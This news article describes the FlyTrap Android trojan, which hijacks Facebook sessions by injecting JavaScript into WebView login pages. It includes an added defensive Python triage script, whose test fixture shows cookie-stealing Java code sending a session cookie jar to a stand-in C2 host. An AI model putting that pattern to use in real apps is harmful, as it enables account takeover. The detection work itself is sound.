A new Android threat that security researchers have named FlyTrap has been found hijacking thousands of users’ Facebook accounts in more than 140 countries by stealing their session cookies.

FlyTrap’s approach is basic: social engineering lures victims into logging into Facebook through maliciously crafted applications, which then capture the data tied to that login session.

Mobile security researchers at Zimperium detected the malware and found that the stolen data was accessible to anyone who located FlyTrap’s command and control server.

Victims lured through high-quality applications

Campaigns using FlyTrap have been running since at least March this year. The threat actors used malicious apps with polished, professional-looking designs, distributed through Google Play and third-party application stores.

The bait has varied, including free coupon codes for Google AdWords and for the Netflix streaming service, and the chance to vote for a favourite football player or team.

Claiming the reward required logging into the app with Facebook credentials, with the authentication itself taking place on Facebook’s genuine domain.

Because the app uses Facebook’s genuine single sign-on, the login form is Facebook’s own and the app never receives the password directly. The app does, however, fully control the WebView that displays that form: it can run script inside the page and read the page’s cookie store, so a login that is legitimate on screen can still be captured. FlyTrap therefore relies on JavaScript injection into the login page to collect session cookies and other sensitive data instead.

The researchers explained:

“Using this technique, the application opens the legit URL inside a WebView configured with the ability to inject JavaScript code and extracts all the necessary information such as cookies, user account details, location, and IP address by injecting malicious JS code.”

All data obtained in this way is sent directly to FlyTrap’s command and control server.
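For an analyst triaging an APK for this pattern, the following is an added example and is not code from the original article, from Zimperium or from FlyTrap itself. It is a static heuristic run over decompiled Android source (such as jadx output) that reports where the building blocks of the technique co-occur: a JavaScript-enabled WebView, the genuine Facebook login URL loaded inside it, and a channel for getting data back out (a cookie-store read, a JavaScript bridge, or script evaluation). The two source fragments, the `Bridge` class, the `NEXT` constant and the C2 host are constructed for illustration.

```python
"""Static triage for the WebView session-hijack pattern (constructed example).

Run over decompiled Android source. It does not prove an app is malicious:
it reports which building blocks of the technique co-occur and on which
lines, so an analyst knows what to read first.
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Each indicator is one building block of the technique: a scriptable WebView,
# the real Facebook login page inside it, and a way to pull data out of it.
INDICATORS: Dict[str, re.Pattern] = {
    "js_enabled":  re.compile(r"setJavaScriptEnabled\s*\(\s*true\s*\)"),
    "js_bridge":   re.compile(r"\baddJavascriptInterface\s*\("),
    "js_inject":   re.compile(r'\bevaluateJavascript\s*\(|\bloadUrl\s*\(\s*"javascript:'),
    "cookie_read": re.compile(r"CookieManager\.getInstance\s*\(\s*\)\s*\.getCookie\s*\("),
    "login_url":   re.compile(
        r"https?://(?:[\w-]+\.)*facebook\.com/(?:login|dialog/oauth)", re.I),
}

# Any URL literal whose host is not Facebook is a candidate exfiltration endpoint.
URL_LITERAL = re.compile(r"""https?://[^\s"']+""")


def _is_facebook_host(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return host == "facebook.com" or host.endswith(".facebook.com")


def _lines(pattern: re.Pattern, source: str) -> List[int]:
    """1-based line numbers at which the pattern matches."""
    return [source.count("\n", 0, m.start()) + 1 for m in pattern.finditer(source)]


def triage(source: str) -> dict:
    """Return a verdict, the line numbers of each indicator and exfil candidates."""
    hits = {name: _lines(pat, source) for name, pat in INDICATORS.items()}
    exfil = sorted({u for u in URL_LITERAL.findall(source) if not _is_facebook_host(u)})
    # The hijack needs all three pieces. Any one of them alone is common in
    # legitimate apps (many apps enable JS in a WebView), so do not flag on one.
    out_channel = bool(hits["cookie_read"] or hits["js_bridge"] or hits["js_inject"])
    suspicious = bool(hits["js_enabled"] and hits["login_url"] and out_channel)
    return {
        "verdict": "suspicious" if suspicious else "benign",
        "hits": hits,
        "exfil_candidates": exfil,
    }


# Constructed decompiled-source fragments standing in for jadx output. The first
# mirrors the pattern the article describes; the second merely shows a public
# page in a JS-enabled WebView. Bridge, NEXT and the C2 host are made up.
SUSPICIOUS_SRC = """\
WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Bridge(), "app");
wv.setWebViewClient(new WebViewClient() {
    @Override
    public void onPageFinished(WebView view, String url) {
        String jar = CookieManager.getInstance().getCookie(url);
        view.evaluateJavascript(
            "app.post(JSON.stringify({c: document.cookie, p: document.body.innerText}))", null);
        Bridge.send("http://c2.example.invalid/collect", jar);
    }
});
wv.loadUrl("https://m.facebook.com/login.php?next=" + NEXT);
"""

BENIGN_SRC = """\
WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.loadUrl("https://www.facebook.com/SomePublicPage");
"""

if __name__ == "__main__":
    for label, src in (("suspicious sample", SUSPICIOUS_SRC), ("benign sample", BENIGN_SRC)):
        result = triage(src)
        print(f"{label}: {result['verdict']}")
        for name, lines in result["hits"].items():
            if lines:
                print(f"  {name}: lines {lines}")
        if result["exfil_candidates"]:
            print(f"  exfil candidates: {result['exfil_candidates']}")
```

The verdict is deliberately conservative: a JS-enabled WebView on its own is normal, and so is loading a Facebook page, so only the co-occurrence of a login URL, script execution and an outbound channel is reported, with line numbers so the analyst can read the injected script and the `onPageFinished` handler directly.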

FlyTrap malware spreads to attack users based in 144 nations

More than 10,000 Android users in 144 countries fell for the campaign. The figures come directly from FlyTrap’s server, which Zimperium researchers were able to reach because the database holding the stolen data was exposed to anyone on the internet.

Aazim Yaswant of Zimperium wrote in a recent blog post that FlyTrap’s server had numerous security vulnerabilities that exposed the stolen information. He added that social media accounts are a popular target for malicious actors, who use them for a wide range of fraudulent purposes, including spreading misinformation and artificially inflating the popularity of products, pages and websites.

The researcher added:

“Just like any user manipulation, the high-quality graphics and official-looking login screens are common tactics to have users take action that could reveal sensitive information. In this case, while the user is logging into their official account, the FlyTrap Trojan is hijacking the session information for malicious intent.”

Although FlyTrap does not use a new technique, it still hijacked a substantial number of Facebook accounts, and Zimperium has warned that with minor modifications it could become a growing danger to mobile users.